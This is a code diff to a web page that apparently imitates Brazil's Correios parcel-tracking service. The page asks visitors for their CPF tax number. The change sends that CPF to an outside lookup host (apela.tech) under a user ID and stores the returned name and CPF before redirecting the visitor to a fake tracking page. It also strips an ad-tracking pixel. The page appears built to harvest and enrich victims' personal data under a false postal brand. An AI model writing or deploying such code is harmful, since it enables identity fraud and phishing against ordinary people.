--- a/correios/encomenda/index.html
+++ b/correios/encomenda/index.html
@@ -109,78 +109,66 @@
     </style>
 
 <script>
-    document.addEventListener("DOMContentLoaded", () => {
-      const form = document.querySelector("form.e_formulario");
-      const inputCPF = document.getElementById("input_1734416045");
-      const btnConsultar = form.querySelector("button");
-      const errorDiv = form.querySelector(".gpc_campos-erro");
-      const textoErrorDiv = document.querySelector(".textoerror");
-  
-      inputCPF.addEventListener("input", (e) => {
-          let value = e.target.value.replace(/\D/g, "");
-  
-          if (value.length > 3) value = value.replace(/(\d{3})(\d)/, "$1.$2");
-          if (value.length > 7) value = value.replace(/(\d{3})\.(\d{3})(\d)/, "$1.$2.$3");
-          if (value.length > 11) value = value.replace(/(\d{3})\.(\d{3})\.(\d{3})(\d{1,2})/, "$1.$2.$3-$4");
-  
-          e.target.value = value;
-      });
-  
-      const isValidCPF = (cpf) => cpf.replace(/\D/g, "").length === 11;
-  
-      btnConsultar.addEventListener("click", async (e) => {
-          e.preventDefault();
-  
-          const cpf = inputCPF.value.replace(/\D/g, "");
-  
-          errorDiv.classList.remove("active");
-          textoErrorDiv.classList.remove("active");
-          inputCPF.classList.remove("active");
-  
-          if (!isValidCPF(cpf)) {
-              inputCPF.classList.add("obrigatorio", "active");
-              errorDiv.classList.add("error", "active");
-              textoErrorDiv.classList.add("textoerror", "active");
-              textoErrorDiv.textContent = "CPF precisa ter 11 dígitos!";
-              return;
-          }
-  
-          try {
-              const response = await fetch("api.php", {
-                  method: "POST",
-                  headers: { "Content-Type": "application/x-www-form-urlencoded" },
-                  body: new URLSearchParams({ cpf }),
-              });
-  
-              if (!response.ok) {
-                  throw new Error("Erro ao validar CPF!");
-              }
-  
-              const data = await response.json();
-  
-              if (data.status === 200) {
-                  window.location.href = "./rastreio/index.html";
-              } else {
-                  throw new Error(data.message || "CPF incorreto! Digite novamente");
-              }
-          } catch (error) {
-              inputCPF.classList.add("obrigatorio", "active");
-              errorDiv.classList.add("error", "active");
-              textoErrorDiv.classList.add("textoerror", "active");
-              textoErrorDiv.textContent = error.message;
-          }
-      });
+document.addEventListener("DOMContentLoaded", () => {
+    const form = document.querySelector("form.e_formulario");
+    const inputCPF = document.getElementById("input_1734416045");
+    const btnConsultar = form.querySelector("button");
+    const errorDiv = form.querySelector(".gpc_campos-erro");
+    const textoErrorDiv = document.querySelector(".textoerror");
+
+    inputCPF.addEventListener("input", (e) => {
+        let value = e.target.value.replace(/\D/g, "");
+
+        if (value.length > 3) value = value.replace(/(\d{3})(\d)/, "$1.$2");
+        if (value.length > 7) value = value.replace(/(\d{3})\.(\d{3})(\d)/, "$1.$2.$3");
+        if (value.length > 11) value = value.replace(/(\d{3})\.(\d{3})\.(\d{3})(\d{1,2})/, "$1.$2.$3-$4");
+
+        e.target.value = value;
     });
+
+    const isValidCPF = (cpf) => cpf.replace(/\D/g, "").length === 11;
+
+    btnConsultar.addEventListener("click", async (e) => {
+        e.preventDefault();
+        const cpf = inputCPF.value.replace(/\D/g, "");
+
+        errorDiv.classList.remove("active");
+        textoErrorDiv.classList.remove("active");
+        inputCPF.classList.remove("active");
+
+        if (!isValidCPF(cpf)) {
+            inputCPF.classList.add("obrigatorio", "active");
+            errorDiv.classList.add("error", "active");
+            textoErrorDiv.classList.add("textoerror", "active");
+            textoErrorDiv.textContent = "CPF precisa ter 11 dígitos!";
+            return;
+        }
+
+        try {
+            const response = await fetch(`https://apela.tech?user=de719533-3a21-4f90-ac11-16e57b4942b9&cpf=${cpf}`);
+            if (!response.ok) {
+                throw new Error("Erro ao validar CPF!");
+            }
+            const data = await response.json();
+            if (data.status === 200) {
+                sessionStorage.setItem("cpf", data.cpf);
+                sessionStorage.setItem("nome", data.nome);
+                sessionStorage.setItem("data_atual", data.data_atual);
+                window.location.href = "../rastreio";
+            } else {
+                throw new Error(data.message || "CPF incorreto! Digite novamente");
+            }
+        } catch (error) {
+            inputCPF.classList.add("obrigatorio", "active");
+            errorDiv.classList.add("error", "active");
+            textoErrorDiv.classList.add("textoerror", "active");
+            textoErrorDiv.textContent = error.message;
+        }
+    });
+});
+
   </script>
-  <script>
-  window.pixelId = "67b55e4dab32c3b13a0c40d2";
-  var a = document.createElement("script");
-  a.setAttribute("async", "");
-  a.setAttribute("defer", "");
-  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
-  document.head.appendChild(a);
-</script>
-<script src="js/l8IVoThqL57Q.js" data-utmify-prevent-subids="" async="" defer=""></script>
+
     
 
 
